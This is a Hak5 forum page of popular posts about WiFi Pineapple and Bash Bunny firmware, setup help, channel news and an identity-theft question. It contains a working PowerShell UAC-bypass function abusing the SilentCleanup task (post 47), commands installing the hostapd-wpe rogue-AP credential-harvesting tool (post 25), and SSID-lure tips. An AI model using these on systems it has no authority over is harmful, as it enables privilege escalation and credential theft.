

Popular Content

Showing content with the highest reputation since 02/28/2020 in all areas

  1. 6 points
    I haven't had a chance to read this entire thread but I can respond to the OP and say, absolutely not, Hak5 is very much alive. I understand that we haven't put out many of our regular videos lately. Personally I've been taking a bit of a hiatus to restructure some things in my life that needed attention. With that said we have a lot of great programming right around the corner coming to the channel - some familiar faces, some new faces, and some fantastic shows all around. Stay tuned for a channel teaser in the next few weeks.
  2. 5 points
    Hi! We're pleased to announce a new release for the WiFi Pineapple NANO: 2.7.0. This update addresses some of the bugs reported by the great community here on the forums and in the Hak5 Discord, as well as updates to some community packages and updates to OpenWRT.

    2.7.0 Changelog:

    General
    - OpenWRT version is now 19.07.2.
    - Kernel has been updated from 4.14.133 to 4.14.171.
    - Fixed an issue where OpenVPN would cause a kernel panic upon establishing tunnel.

    Recon
    - Fixed an issue where live scans would fail on the WiFi Pineapple TETRA.

    Reporting
    - Fixed an issue where emails would not be sent.
    - Improved the user experience by automatically saving email settings when testing emails.
    - Improved the user experience by forcing an email to send when testing, regardless of whether the "Send Email" option was checked.

    Advanced
    - Fixed an issue where swap would not be mounted automatically on the NANO's SD Card.
    - Renamed "USB" panel to "USB & Storage".

    Misc
    - Added SSLSplit package to repositories. This fixes the SSLSplit module dependencies.
    - Updated Kismet package in repositories.
    - Updated Kismet-RemoteCap package in repositories.

    You can update your WiFi Pineapple NANO Over-The-Air via the Advanced module or manually at the Hak5 Download Center.

    ♥ - The Hak5 Development Team
  3. 5 points
    Seems unnecessarily aggressive...
  4. 4 points
    Hi! We're pleased to announce a new release for the WiFi Pineapple TETRA: 2.7.0. This update addresses some of the bugs reported by the great community here on the forums and in the Hak5 Discord, as well as updates to some community packages and updates to OpenWRT.

    2.7.0 Changelog:

    General
    - OpenWRT version is now 19.07.2.
    - Kernel has been updated from 4.14.133 to 4.14.171.
    - Fixed an issue where OpenVPN would cause a kernel panic upon establishing tunnel.

    Recon
    - Fixed an issue where live scans would fail on the WiFi Pineapple TETRA.

    Reporting
    - Fixed an issue where emails would not be sent.
    - Improved the user experience by automatically saving email settings when testing emails.
    - Improved the user experience by forcing an email to send when testing, regardless of whether the "Send Email" option was checked.

    Advanced
    - Fixed an issue where swap would not be mounted automatically on the NANO's SD Card.
    - Renamed "USB" panel to "USB & Storage".

    Misc
    - Added SSLSplit package to repositories. This fixes the SSLSplit module dependencies.
    - Updated Kismet package in repositories.
    - Updated Kismet-RemoteCap package in repositories.

    You can update your WiFi Pineapple TETRA Over-The-Air via the Advanced module or manually at the Hak5 Download Center.

    ♥ - The Hak5 Development Team
  5. 3 points
    The device has been on the market since 2015 and in that time has seen continuous updates and patches. 2.7 was released a little over a week ago. For a device so buggy and unreliable, many are using it and successfully so. Trust it for what? Your livelihood? Job? A tool is only as reliable as the person using it. If you stake your reputation on a single device, that reflects on your own poor judgement and shows a serious lack of skill in risk planning. It also demonstrates that you really have no idea what you are doing as no one would use a singular device in such a critical test and if they absolutely had to, they'd have the skills and foresight to plan for any issues they may encounter.
  6. 3 points
    Or is this because of supply chain issues due to the outbreak?
  7. 3 points
    https://www.just-fucking-google.it/?s=what is ntopng
  8. 2 points
    In reality it is a combination of things. Most of the time it seems that there are three main purchasing groups for these products.

    Professionals: They typically have a good understanding of the software/firmware being used before purchasing so the transition to the device is easy. In my experience this group will a lot of times not update their device once they have the features they need working. This helps prevent issues due to "latest" version firmware and waiting for patches to modules.

    Hackers/True Enthusiasts: They typically are in it for the joy and learning experience. Help find bugs and issues as well as develop modules.

    Splurge Buyers: Ones who have no idea how the device works or functions. Most of the time individuals who buy the device because they heard it can "hack wifi" so they buy it thinking they will click one button and have the password to any WiFi network they please.

    Issues seem to come most from the last group as the device did not meet their expectations. Now all groups have unsatisfied users as well but it seems not as much from the first two. This is a very rough overview but I feel this is important information when deciding to purchase the device. I have owned wifi pineapples since the markIV and have had my ups and downs. Sometimes at the fault of buggy firmware and other times at my own cause. Most recent issues seem to be users not understanding that modules are "community modules" and not developed by the Hak5 team. These are my opinions, and I am in no way calling anyone wrong.
  9. 2 points
    https://forums.hak5.org/topic/28600-do-not-post-wifi-pineapple-related-questions-here/ Very first topic in here.
  10. 2 points
    Be sure that the WiFi Pineapple NANO is provided the requisite 9W of power. See the power consideration article at https://docs.hak5.org/hc/en-us/articles/360010471754-Power-Considerations Essentially, a typical 2A USB source will be adequate - but if an unpowered hub is used with other accessories attached, you'll experience reboots and/or boot loops if the device isn't adequately powered.
  11. 1 point
    😄 I have been procrastinating on getting this setup for a while. It was fine for the first 5 episodes being that they were mostly purely instructional setup. But now we are diving deep into the educational aspect that encourages a lot of exploration and collaboration. Let's see how it goes! I'll be adapting future episodes around what I see here.
  12. 1 point
    Just to address this: Devices that are not sold by us or the retailers we partner with are not guaranteed to have not been used in the past. Buying new parts from us directly or the retailers we choose don't come with a password set.
  13. 1 point
    Cherry-picking details from the logs that you deem strange doesn't help us diagnose any potential issues. Full log output is appreciated.
  14. 1 point
    Keep in mind you can always access your WiFi Pineapple's serial console - which will provide a bash terminal on the linux OS - right from the UART port. This is incredibly helpful for debugging as you'll see the system log live as the device boots and while interacting with the shell. Here's more on this feature: https://docs.hak5.org/hc/en-us/articles/360010555553-Serial-Access-WiFi-Pineapple-TETRA
  15. 1 point
    Buy an old school non-smart phone, use that for a couple of months instead of your iPhone. Stay off the internet as well during that time. The evil step mother will soon get bored and move on. Also, if she has that level of skill, point her at one of the big bug bounty platforms as they pay millions for people who are able to do what you claim she is doing.
  16. 1 point
    Hello, I have recently been a victim of identity theft and I really want to understand how someone or some group did this. So here is what happened: on 1/27/2020 I logged into my banking app and noticed several charges from my checking account to online casinos in NJ. These charges started on 1/3/2020 (and before you ask, yes I’m an idiot who doesn’t check their statement or banking app often). Whoever accessed my checking account was able to sign up for online casinos in NJ with my name and all my info such as date of birth, social security number, address and so forth. My checking account has been drained. I called the bank and they are telling me the activity came from my IP address and the casinos are saying that their geolocation places the transactions at my home. I do live in an apartment complex and the only other person in my home is my boyfriend (he is not computer savvy so I know it wasn’t him. Also I asked him and he said no). I looked into sim swapping but I never lost service on my phone. I did sell my old iPhone online via Swappa. I did a factory reset on my phone before mailing it out. My bank is stating they do not believe these charges are fraudulent (basically they are saying I did this). I currently have a lawyer and am disputing this issue with my bank. What I really want to understand is how this happened and how I can protect myself in the future. Any help or advice is greatly appreciated. Sincerely, broke and confused
  17. 1 point
    😂 And kids using Kali so they can say they are Elite.
  18. 1 point
    Regardless, these are buggy as hell and unreliable. They're cool for a hobbyist thing but would never trust it and wouldn't recommend anyone else does either.
  19. 1 point
    Could you let me know your order number via a forum message? Thanks.
  20. 1 point
    Yes. The ATTACKMODE command supports spoofing multiple ID values including VID, PID, Manufacturer, and Serial Number.
  21. 1 point
    It's so sad that there even has to be a pinned topic "do not post....". Why can't people just like scroll down??? There are different sections for every tool.
  22. 1 point
    Too long, and that's my fault. I really need to find a scalable solution to this but thus far haven't.
  23. 1 point
  24. 1 point
    https://forums.hak5.org/forum/56-usb-rubber-ducky/ Check in the correct section of the forums.
  25. 1 point
    One of the biggest gaps I have found with the pineapple is the inability to perform hostapd-wpe type attacks. Thankfully, there is an OpenWRT package for hostapd-wpe that seems to work very well... I just wanted to share in case anybody else needed the Pineapple to do this also....

    ssh to your pineapple...

    ########
    cd /tmp
    wget https://github.com/TarlogicSecurity/hostapd-wpe-openwrt/raw/master/packages/ar71xx/generic/hostapd-wpe_2014-06-03.1-1_ar71xx.ipk
    opkg install ./hostapd-wpe_2014-06-03.1-1_ar71xx.ipk
    ######

    The configuration files are in /usr/local/etc/hostapd-wpe

    I changed the wifi to wlan1 and executed with

    hostapd-wpe ./yourconfig.conf

    Unfortunately I haven't had the time to create a GUI for it... I would love to see this integrated into PineAP functionality at some point... but until then, I hope somebody has the time and passion to wrap a GUI around it!! Hope this helps somebody out.
  26. 1 point
    Lol, this isn't a Darren issue. It is MS doing their due diligence and fixing an issue. If you want to get hashes from locked machines, you will need to come up with a new method....not Darren. He has given you the tool to use whatever you come up with. Use it damnit.
  27. 1 point
    Why do you ping Darren... Why do you say "agree". How can you agree to an answer to a question you asked. What do you mean with "locked computer" problem? It is not a "problem" that the computer is locked. It is a requirement, because we assume that the computer is locked and we want to have a payload that works with locked computers.
  28. 1 point
    O.MG Cable Usage
  29. 1 point
    Didn't know about the users, thanks! Found the VNC.start indeed, mine says I inserted the -noviewonly and -forever myself, didn't help. When I look at the running processes X11 actually runs with those parameters but it's still viewonly.
  30. 1 point
    Oh, nice. Didn't know about that site. I think I will use that for semi-stupid questions in future. But don't get me wrong. Whenever you have a question, ask it. I'm not blaming and I never will blame someone for asking basic/"noob" questions. I'm against people who don't even think of doing something by themselves. They just ask something and hope somebody will answer them, they don't even google it. If you show effort, you'll get your answers, I'm sure. You know, I would surely post a more detailed answer to a question like "I don't understand how <something> works. I googled it and tried troubleshooting by myself, here's what I already did: <examples>. Could somebody please give me some hints?" than to a question like "can somebody explain <something>".
  31. 1 point
    Thanks Darren I'm looking forward to it! Also if there's any chance that either on here or through a video that you could give us an update on pretty much everything that would be great. I'd be interested to know what happened to Tekthing, where it's going or if it's coming back. Anything new from Mubix. I've heard some people say you've all moved. Not asking for anything too personal from everyone but I've been watching Hak5 since the beginning so any updates would be greatly appreciated. I do miss that weekly dose of technolust!
  32. 1 point
    Question: is the external USB hub powered, or is an unpowered hub?
  33. 1 point
    You'll learn nothing if you just copy-paste the payloads. And yes, they work on windows 10. And also, we can't help you if you just say "it doesn't work", please describe your problem first. Like idk where the problem is, when you don't describe it. I shouldn't even answer you because you are at the wrong part of the forum as jtyle6 already said. Please make another post.
  34. 1 point
    "\$" escapes question mark. "\\" escapes back slash. "\\\$" escapes back slash and question mark.
  35. 1 point
    I have to say, I also have noticed the decline in new content, and feel a little sad, I really miss the show. But, on that note, I actually worry more about the crew, if they are okay, doing good and hopefully are busy with day to day life and work 🙂 But, producing digital content / media content IS a lot of work. A good crew can produce 45 minutes of content in 7 working days. Let's remember that Darren, Snubs and the rest did all this because their hearts burned for it, they believed in it. So, I think it's fair they take some time off, they deserve it more than anyone. Maybe it could be time for someone else to carry the torch, make new content, and ask H5 to just distribute it, if they want. Anyone willing to step up to the plate? But, let's face it. Researching "hacking", and being public about it, are hard times. I ran my own little research shop, and my own small infrastructure, focusing on Kali, lockpicking, alarm systems and CCTV. I just shut down shop, because it was giving me problems, so as a "hacker", these are not good times. I believe it's important to share knowledge, to do what we can to inform the public, but right now, I'm thinking "why bother". All my best to the entire Hak5 crew, past and present, and thanks for being there, for everything you did, and still do. It's very much appreciated 🙂
  36. 1 point
    Yeah, would be good to get some clarity......but the Threat Wire and Shannon Morse are still showing via Hak5 on youtube, so all a bit strange.......
  37. 1 point
    Shannon Morse is moving Threat Wire to Colorado in two weeks.........lock, stock.....the lot!
  38. 1 point
    New Tetra? If only we can get the old one fully functional first.
  39. 1 point
    Yes @Idk_Man I did perform the Firmware-Recovery procedure the way you describe using the Firmware Recovery Image - https://docs.hak5.org/hc/en-us/articles/360010471774-Firmware-Recovery . I'm glad you managed to duplicate the issue. I'll try to use your solution and report back. Thank you for figuring it out!
  40. 1 point
    Everyone also has to realize that if Hak5 were to become responsible for producing the 3rd party modules, they would open themselves up to all sorts of nasty lawsuits and the feds would quickly shut them down. Hak5 is responsible for the physical NANO and its main operating system; nothing else. Everything else is left open to the community. It's no different than any other product on the open market available for consumers. EXAMPLE: Anyone can legally buy an ordinary pencil from a store. No big deal, right? However the end user has the choice on how they wish to use the pencil. They can choose to use the pencil in a legal manner - on paper - or use the pencil to stab someone in the eyeball (now that pencil becomes an illegal weapon). The pencil itself isn't illegal by nature. How the pencil is used by the end user determines the legality of the pencil. **Hypothetically** (Don't do this!) if you walk into any police station and try to have them arrest you for carrying a normal, everyday pencil, they'd look at you like you were insane. You won't get arrested for walking around with a pencil on your person. Now take that same pencil in our hypothetical situation and stab that same police officer (Don't do this!) who just said he won't arrest you for carrying around a pencil. You'll get jumped and arrested before you even know what's going on (and you'll probably get 6 warning shots to the back for good measure lol). You as the end user took a perfectly legal item and just turned it into an illegal weapon. Is that the fault of the pencil company? Absolutely not. The pencil company only produces legal pencils for its customers. That end user decided to use the pencil in an illegal manner. So, if Hak5 decided to start writing their own modules with their name on it which allowed end users to use their product in an illegal manner, the NANO would then become an illegal object to own.
(Imagine if the same pencil company put instructions on how to stab people with their pencils on their boxes.) How quickly would that company be getting dragged into court? 1 day? It's up to the Hak5 community to write our own modules and decide for ourselves on how to use the NANO. So if you're unhappy about the 3rd party modules not working quite right, I suppose you'd better brush up on your coding and make the necessary edits to allow you to accomplish your own end goals. If you break it down the NANO is really just running the Kali Linux software inside a custom built hardware shell. And last time I checked, owning a Kali Linux OS is not illegal. How you use it determines the legality.
  41. 1 point
    Hey, great you found your way to the Hak5 Forum. What really confuses me are those several points (how they could do this): 1. I assume that you have 2-Factor Authentication on, else you would be really dumb. Sorry but this is your banking account. It is hard to trick 2FA but it can be done, for example with a phishing site that also grabs your cookies. That means they got your cookies and the cookies tell your E-Banking website that you've logged in 2 minutes ago and you don't have to do 2FA right now. 2. I'm not an expert, but I think it is really hard to trick the IP address and that it still fits with the geological place. Idk how they did it, but I have an idea. My theory on how they did this: I think you got tricked and they got access to your PC. Else, I couldn't imagine how they should trick all systems. My guess: they got your login password of your computer somehow. How did they get it? I don't know, maybe you got phished and your Facebook password is the same as your computer password. Or they phished your Microsoft password, and with that they can also log in to your computer. You can remotely log into a computer as long as you have the login credentials and the other computer is turned on. After they got access to your computer they logged into your banking account from your computer. Idk how your settings are but some people don't have to do 2FA from their personal devices each time they log in. How did they get your bank password? That's easy if they have access to your computer. 2FA is very important. That would also explain why it came all from your IP address and your location. Because it was your computer who did it, it was just remotely controlled. What I recommend you to do: First of all, let your antivirus do a full scan of your computer. Maybe they did place a keylogger on your PC in case you would reset your passwords. If that would be the case, they would also have the new passwords, which would make your whole security crumble.
Sometimes keyloggers also don't get detected by AVs, so be sure to look at the processes in the task manager from time to time and check if there are some suspicious apps running. Second: Untrust all devices you have. By that I mean that your phone probably knows that your computer is a trusted device and won't message you if someone logs into an account of yours (from the computer). I would reset all passwords, untrust and re-trust your devices, and turn all possible security features on (for example 2FA). Just do a reset, like you would if you bought a new phone. I don't mean to do a factory reset or delete all files, just renew your accounts and passwords. I know this is a lot of work and it is very boring, but it is only for your security. If you see suspicious activity on your banking again, immediately block it. It saves you a lot of money and work. Let me know if there is anything else you would like to say. Cheers
  42. 1 point
    I currently have my Raspberry Pi 4 (4GB) setup running Kismet. I then have both my Pineapple Nano and Tetra running "kismet-remote", sending the captures to the Kismet server on the Raspberry Pi. The Tetra is actually powerful enough to run the main kismet server, though not with the same performance as on the Raspberry. Using the above setup gives me the same performance as running kismet on my desktop.
  43. 1 point
    https://www.kismetwireless.net/docs/readme/git_and_beta/ has guides for installing and setup. Not sure on performance of doing this with the tetra but have seen what you are wanting done with R Pi.
  44. 1 point
    All these modules including EP are 3rd party modules, and going from MK5 to MK6 this module was completely redesigned. This is not fluxion because it's not for script kiddies to just run and get results; if you want a specific portal, make it. I don't disagree that some of the functionality is off but if you can make it better.... why bitch about it, help the developer. These guys take time out of their own busy schedules to help make these and are not paid by Hak5, nor are any of the modules supported by Hak5.
  45. 1 point
    Have to agree here. It is a real eye opener, but I get the feeling that the DC may hold more that could not be shown.........😎
  46. 1 point
    I'm a sysadmin in my day job....A LOT of sysadmins only have very basic knowledge of security. I don't want to be one of those sysadmins.
  47. 1 point
    function sudo {
        $command = "powershell -noexit " + $args + ";#"
        Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value $command
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir"
    }

    Quick function that works like sudo 🙂
  48. 1 point
    Okay, I came up with some steps for the newcomers to get up and going on their BBs. This includes testing your BB after you got it to make sure it is working and then updating.

    1) After you get your bunny, stick it in arming mode. Switch position closest to the USB port.
    2) Put BB in computer. It should come up as a USB storage device.
    3) Inspect that the device has a loot, tools and payload folder.
    4) In the payload folder go into the switch1 folder.
    5) In the payload.txt file clear all text out of it and put the following. This is for Windows machines.

    ATTACKMODE HID
    LED G R
    Q DELAY 5000
    Q GUI R
    Q DELAY 500
    Q STRING notepad
    Q DELAY 500
    Q ENTER
    Q DELAY 2000
    Q STRING "Hello World"
    Q DELAY 500
    Q ENTER
    LED B R
    ATTACKMODE RNDIS_ETHERNET
    LED G

    6) On Windows the above should open up notepad and type hello world. After that it will switch to attackmode ethernet for Windows.
    7) At this point you can try and ping If you get a ping back, ethernet seems to be up. Now, try and use putty to ssh into the BB using root as login name and hak5bunny as password. If you get in, your bunny should be golden at default.

    Now, time for the fun part. On this part you are going to firmware upgrade the Bunny. Only a few people have had bad luck with this, most of the issues have been from lack of patience. It takes a while, on mine it took 5-10 mins so make sure your machine is plugged into live power and the USB port you are using is good. You want no interruptions. Kill that USB powersave mode too.

    Now, download the firmware from here and do check the checksum, it is there for you to make sure your download was not corrupted. https://wiki.bashbunny.com/#!downloads.md

    Unplug the bunny and switch it back to arming mode, switch position closest to USB port, and put it back in. When the storage for it comes up, copy the file still compressed to the root of the bunny storage folder (not in loot, not in tools and not in payloads).

    Safely eject the bunny from Windows and unplug the bunny from the USB port, wait 5-10 seconds and plug it back in and do the hardest part.....wait. If upgrading from 1.0, the LED will flash red while it is flashing. It will flash red for a while. Let it flash red, leave it alone, do not do stuff on the computer that it is plugged into, go do something else. When it is done it will flash blue and your BB storage will show up again.

    From this part you copy the tools from this forum thread to the tools folder on the BB storage drive. After you have done that, tell Windows to eject the BB drive so it is sure to sync and not create a dirty bit. (Whenever you are going to disconnect in arming mode, always eject the BB.) Wait 5 seconds and plug it back in and wait. When the BB is done installing the tools, the storage drive will show up again for the BB.

    At this point you should be updated and ready to go. Go grab some payloads and try them out. Copy the contents of one of the payload's folder to a switch folder. Do not copy the folder itself into the switch folder, just what is inside the folder (contents).

    If your storage folder is operational but empty like it has gotten erased, you will have to serial into the BB while in arming mode and do a " udisk reformat". Adding folders by hand back in will not work due to permission differences. Serialing into the BB can be found on the wiki here, along with SSH instructions and emergency firmware recovery. https://wiki.bashbunny.com/#!index.md
  49. 1 point
    This has been very high on my todo list. I'll see if I can speed it up.
  50. 1 point
    I keep different versions of the file depending on the use case. Many times I'm looking to grab unassociated clients in a particular area. For that purpose I have a file of just the top 100, public, free wifi points in the area. Throughout a week of capturing clients, the Nano will pick up more SSIDs during the course of doing business. At the end of the week the top 100 file gets reloaded to the /etc/pineapple/. I've found that once you reach a ridiculous number of SSIDs, it takes a longer time to capture a device if you get it to associate at all. Having a targeted list along with watching for SSIDs being beaconed by the client seems to work pretty well.

    Within the /etc/pineapple/ directory make yourself some copies of ssid_file. In my case it may look like this:

    cp ssid_file myTop100ssids
    cp ssid_file topssidsinKentucky
    cp ssid_file topssidsinCleveland

    Next, edit each one of these copies to your specifications. I use nano.

    nano myTop100ssids

    After editing press [Ctrl o] to save and [Ctrl x] to exit. To load up a file type for use.

    cp myTop100ssids ssid_file

    This will copy myTop100ssids and rename it ssid_file for use by the pineapple. Forgive me if this is something you were already aware of how to do but I thought it might help based on the question. Have a great day!